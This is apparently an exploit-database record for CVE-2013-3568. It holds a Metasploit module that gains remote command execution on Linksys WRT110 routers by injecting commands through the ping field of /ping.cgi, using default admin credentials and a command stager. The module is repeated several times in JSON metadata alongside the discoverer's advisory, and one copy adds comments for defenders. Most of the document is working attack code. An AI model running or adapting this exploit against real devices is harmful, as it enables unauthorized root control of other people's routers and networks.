ID 1337DAY-ID-21361 Type zdt Reporter metasploit Modified 2013-10-10T00:00:00
Description
Exploit for hardware platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
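# Metasploit module for CVE-2013-3568: command injection through the ping
# field of the Linksys WRT110 web administration interface.
#
# The module sends HTTP Basic credentials (USERNAME/PASSWORD, both defaulting
# to "admin") with every authenticated request and hands command delivery to
# the echo command stager mixin.
#
# Notes for defenders reading this listing:
# - Every request built by execute_command is a POST to /ping.cgi carrying a
#   `pingstr` form field. A `pingstr` value that is not a plain host name or
#   IP address is the observable to alert on.
# - This module needs valid administrator credentials. The public advisory
#   referenced below also describes a CSRF route that this module does not
#   use, so a changed admin password narrows exposure to this module only.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStagerEcho

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linksys WRT110 Remote Command Execution',
      'Description'    => %q{
        The Linksys WRT110 consumer router is vulnerable to a command injection
        exploit in the ping field of the web interface.
      },
      'Author'         =>
        [
          'Craig Young', # Vulnerability discovery
          'joev', # msf module
          'juan vazquez' # module help + echo cmd stager
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-3568'],
          ['BID', '61151'],
          ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
        ],
      'DisclosureDate' => 'Jul 12 2013',
      'Privileged'     => true,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSLE,
      'Targets'        =>
        [
          ['Linux mipsel Payload', {}]
        ],
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new('USERNAME', [true, 'Valid router administrator username', 'admin']),
      OptString.new('PASSWORD', [false, 'Password to login with', 'admin']),
      OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
      OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
    ], self.class)
  end

  # Fingerprints the device through its unauthenticated /HNAP1/ page.
  #
  # The check only matches the model name in the response; it never exercises
  # the ping field. A match is therefore reported as Appears rather than
  # Vulnerable, and a missing answer as Unknown rather than Safe.
  #
  # @return [Array] one of the Exploit::CheckCode constants
  def check
    begin
      res = send_request_cgi({
        'uri' => '/HNAP1/'
      })
    rescue ::Rex::ConnectionError
      # An unreachable host is no evidence either way; Safe here would give
      # false assurance to whoever reads the scan result.
      return Exploit::CheckCode::Unknown
    end

    # No response object at all is treated the same as a connection error.
    return Exploit::CheckCode::Unknown unless res

    if res.code == 200 && res.body =~ /<ModelName>WRT110<\/ModelName>/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Entry point: confirm the credentials work, then run the command stager.
  # The stager mixin is expected to call execute_command for each chunk.
  def exploit
    test_login!
    execute_cmdstager
  end

  # Sends an authenticated GET for "/" and aborts the module through
  # fail_with(Failure::NoAccess) when there is no response or the router
  # answers 401 or 404.
  #
  # NOTE(review): both status messages interpolate the password, so it ends
  # up in clear text in the module output and in anything that captures it.
  def test_login!
    print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")

    res = send_auth_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

    if !res || res.code == 401 || res.code == 404
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
    else
      print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
    end
  end

  # Submits one command through the `pingstr` field of /ping.cgi.
  #
  # The advisory for CVE-2013-3568 attributes the flaw to the web interface
  # not sanitizing ping targets; the fix on the device side is to accept only
  # a host name or IP address in this field.
  #
  # @param cmd [String] command text supplied by the stager
  # @param opts [Hash] stager options; not read by this method
  def execute_command(cmd, opts)
    send_auth_request_cgi({
      'uri'       => '/ping.cgi',
      'method'    => 'POST',
      'vars_post' => {
        'pingstr' => '& ' + cmd
      }
    })

    Rex.sleep(1) # Give the device a second
  end

  # Helper methods

  # @return [String] the configured administrator username
  def user
    datastore['USERNAME']
  end

  # @return [String] the configured password, or '' when none is set
  def pass
    datastore['PASSWORD'] || ''
  end

  # Wraps send_request_cgi, adding an HTTP Basic authorization header built
  # from USERNAME/PASSWORD and turning a connection error into a module
  # failure.
  #
  # @param opts [Hash] request options; left unmodified
  # @param timeout [Integer, nil] seconds to wait; defaults to TIMEOUT
  # @return the value returned by send_request_cgi
  def send_auth_request_cgi(opts = {}, timeout = nil)
    timeout ||= datastore['TIMEOUT']
    # merge instead of merge!, so the caller's hash does not silently gain
    # an authorization entry.
    request_opts = opts.merge('authorization' => basic_auth(user, pass))
    begin
      send_request_cgi(request_opts, timeout)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end
end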
# 0day.today [2018-01-10] #
{"hash": "bbb11467bebd048f22960838503f1c2f7a970db9cd2cf057bb98ff534275fd77", "id": "1337DAY-ID-21361", "lastseen": "2018-01-10T21:27:16", "viewCount": 6, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1737fa4e58f4dc3cbcc8aa07ad173cd5", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "7f6e2c7295eb8d1b299a85dc2e36b15b", "key": "href"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "modified"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "02eb27f2f0d16ec88db3a44451259157", "key": "sourceData"}, {"hash": "e279e7891f7fd205a1187ab03ede92a4", "key": "sourceHref"}, {"hash": "10c6449bdcb30c899c259fed9b074dbd", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-01-10T21:27:16"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29549", "SECURITYVULNS:VULN:13169"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/LINKSYS_WRT110_CMD_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123333", "PACKETSTORM:123540"]}, {"type": "exploitdb", "idList": ["EDB-ID:28856", "EDB-ID:28484"]}, {"type": "zdt", "idList": ["1337DAY-ID-21262"]}], "modified": "2018-01-10T21:27:16"}, "vulnersScore": 0.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21361", "description": "Exploit for hardware platform in category remote exploits", "title": "Linksys WRT110 Remote Command Execution Vulnerability", "history": [{"bulletin": {"hash": "5426ca4668389dba727bea751ea9d1cd7d32f7eaaa6ffb1085f5d9756e9dcd6d", "id": "1337DAY-ID-21361", 
"lastseen": "2016-04-19T02:01:37", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-19T02:01:37"}}, "hashmap": [{"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0b655dc1f6847d7dded22fc58ce41c68", "key": "sourceData"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "modified"}, {"hash": "1c41d1d20b99b65960f5f9fce0a8f30f", "key": "sourceHref"}, {"hash": "c122ae5d2e4fb4b319c246fc2bf44076", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "published"}, {"hash": "10c6449bdcb30c899c259fed9b074dbd", "key": "title"}, {"hash": "1737fa4e58f4dc3cbcc8aa07ad173cd5", "key": "cvelist"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/21361", "description": "Exploit for hardware platform in category remote exploits", "viewCount": 0, "title": "Linksys WRT110 Remote Command Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": ["CVE-2013-3568"], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n \r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n \r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def exploit\r\n test_login!\r\n \r\n execute_cmdstager\r\n end\r\n \r\n # Sends an HTTP request with authorization header 
to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n \r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n \r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n \r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n \r\n Rex.sleep(1) # Give the device a second\r\n end\r\n \r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n \r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-19] #", "published": "2013-10-10T00:00:00", "references": [], "reporter": "metasploit", "modified": "2013-10-10T00:00:00", "href": "http://0day.today/exploit/description/21361"}, "lastseen": "2016-04-19T02:01:37", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2013-3568"], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n \r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n \r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def exploit\r\n test_login!\r\n \r\n execute_cmdstager\r\n end\r\n \r\n # Sends an HTTP request with authorization header 
to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n \r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n \r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n \r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n \r\n Rex.sleep(1) # Give the device a second\r\n end\r\n \r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n \r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "published": "2013-10-10T00:00:00", "references": [], "reporter": "metasploit", "modified": "2013-10-10T00:00:00", "href": "https://0day.today/exploit/description/21361"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nHi list,\r\nI would like to inform you that the latest available Linksys WRT110 firmware is prone to root shell command injection via cross-site request forgery. This vulnerability is the result of the web interface's failure to sanitize ping targets as well as a lack of csrf tokens. Linksys/Belkin has responded to my report to say that the vulnerability is mitigated by a 10 minute idle-timeout feature which is available for the admin portal on this device. It is likely that other devices with similar firmware are prone to this as well.\r\n\r\nThe command execution will not return output but it is possible to direct output into files which are available upon subsequent HTTP requests.\r\n\r\nThis issue was assigned as CVE-2013-3568.\r\n\r\nKind Regards,\r\nCraig Young (@CraigTweets)\r\n", "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29549", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29549", "title": "CVE-2013-3568 - Linksys CSRF + Root Command Injection", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Crossite request forgery, XSS, code execution in web administration interface.", "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13169", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13169", "title": "Linksys routers security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:21", "bulletinFamily": "exploit", "description": "", "modified": "2013-09-20T00:00:00", "published": "2013-09-20T00:00:00", "href": "https://packetstormsecurity.com/files/123333/Linksys-WRT110-Remote-Command-Execution.html", "id": "PACKETSTORM:123333", "type": "packetstorm", 
"title": "Linksys WRT110 Remote Command Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStagerEcho \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linksys WRT110 Remote Command Execution', \n'Description' => %q{ \nThe Linksys WRT110 consumer router is vulnerable to a command injection \nexploit in the ping field of the web interface. \n}, \n'Author' => \n[ \n'Craig Young', # Vulnerability discovery \n'joev <jvennix[at]rapid7.com>', # msf module \n'juan vazquez' # module help + echo cmd stager \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2013-3568'], \n['BID', '61151'], \n['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] \n], \n'DisclosureDate' => 'Jul 12 2013', \n'Privileged' => true, \n'Platform' => ['linux'], \n'Arch' => ARCH_MIPSLE, \n'Targets' => \n[ \n['Linux mipsel Payload', { } ] \n], \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), \nOptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), \nOptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), \nOptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) \n], self.class) \n \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/HNAP1/' \n}) \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Safe \nend \n \nif res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ntest_login! 
\n \nexecute_cmdstager \nend \n \n# Sends an HTTP request with authorization header to the router \n# Raises an exception unless the login is successful \ndef test_login! \nprint_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\") \n \nres = send_auth_request_cgi({ \n'uri' => '/', \n'method' => 'GET' \n}) \n \nif not res or res.code == 401 or res.code == 404 \nfail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\") \nelse \nprint_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\") \nend \nend \n \n# Run the command on the router \ndef execute_command(cmd, opts) \nsend_auth_request_cgi({ \n'uri' => '/ping.cgi', \n'method' => 'POST', \n'vars_post' => { \n'pingstr' => '& ' + cmd \n} \n}) \n \nRex.sleep(1) # Give the device a second \nend \n \n# Helper methods \ndef user; datastore['USERNAME']; end \ndef pass; datastore['PASSWORD'] || ''; end \n \ndef send_auth_request_cgi(opts={}, timeout=nil) \ntimeout ||= datastore['TIMEOUT'] \nopts.merge!('authorization' => basic_auth(user, pass)) \nbegin \nsend_request_cgi(opts, timeout) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/123333/linksys_wrt110_cmd_exec_stager.rb.txt"}, {"lastseen": "2016-12-05T22:21:46", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-08T00:00:00", "published": "2013-10-08T00:00:00", "href": "https://packetstormsecurity.com/files/123540/Linksys-WRT110-Remote-Command-Execution.html", "id": "PACKETSTORM:123540", "type": "packetstorm", "title": "Linksys WRT110 Remote Command Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. 
\n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStagerEcho \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linksys WRT110 Remote Command Execution', \n'Description' => %q{ \nThe Linksys WRT110 consumer router is vulnerable to a command injection \nexploit in the ping field of the web interface. \n}, \n'Author' => \n[ \n'Craig Young', # Vulnerability discovery \n'joev', # msf module \n'juan vazquez' # module help + echo cmd stager \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2013-3568'], \n['BID', '61151'], \n['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] \n], \n'DisclosureDate' => 'Jul 12 2013', \n'Privileged' => true, \n'Platform' => ['linux'], \n'Arch' => ARCH_MIPSLE, \n'Targets' => \n[ \n['Linux mipsel Payload', { } ] \n], \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), \nOptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), \nOptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), \nOptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) \n], self.class) \n \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/HNAP1/' \n}) \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Safe \nend \n \nif res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ntest_login! \n \nexecute_cmdstager \nend \n \n# Sends an HTTP request with authorization header to the router \n# Raises an exception unless the login is successful \ndef test_login! 
\nprint_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\") \n \nres = send_auth_request_cgi({ \n'uri' => '/', \n'method' => 'GET' \n}) \n \nif not res or res.code == 401 or res.code == 404 \nfail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\") \nelse \nprint_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\") \nend \nend \n \n# Run the command on the router \ndef execute_command(cmd, opts) \nsend_auth_request_cgi({ \n'uri' => '/ping.cgi', \n'method' => 'POST', \n'vars_post' => { \n'pingstr' => '& ' + cmd \n} \n}) \n \nRex.sleep(1) # Give the device a second \nend \n \n# Helper methods \ndef user; datastore['USERNAME']; end \ndef pass; datastore['PASSWORD'] || ''; end \n \ndef send_auth_request_cgi(opts={}, timeout=nil) \ntimeout ||= datastore['TIMEOUT'] \nopts.merge!('authorization' => basic_auth(user, pass)) \nbegin \nsend_request_cgi(opts, timeout) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/123540/linksys_wrt110_cmd_exec.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T09:05:01", "bulletinFamily": "exploit", "description": "Linksys WRT110 - Remote Command Execution. CVE-2013-3568. Remote exploit for hardware platform", "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "id": "EDB-ID:28856", "href": "https://www.exploit-db.com/exploits/28856/", "type": "exploitdb", "title": "Linksys WRT110 - Remote Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n\r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n test_login!\r\n\r\n execute_cmdstager\r\n end\r\n\r\n # Sends an HTTP request with authorization header to the 
router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n\r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n\r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n\r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n\r\n Rex.sleep(1) # Give the device a second\r\n end\r\n\r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n\r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/28856/"}, {"lastseen": "2016-02-03T08:15:57", "bulletinFamily": "exploit", "description": "Linksys WRT110 - Remote Command Execution. CVE-2013-3568. Remote exploit for hardware platform", "modified": "2013-09-23T00:00:00", "published": "2013-09-23T00:00:00", "id": "EDB-ID:28484", "href": "https://www.exploit-db.com/exploits/28484/", "type": "exploitdb", "title": "Linksys WRT110 - Remote Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
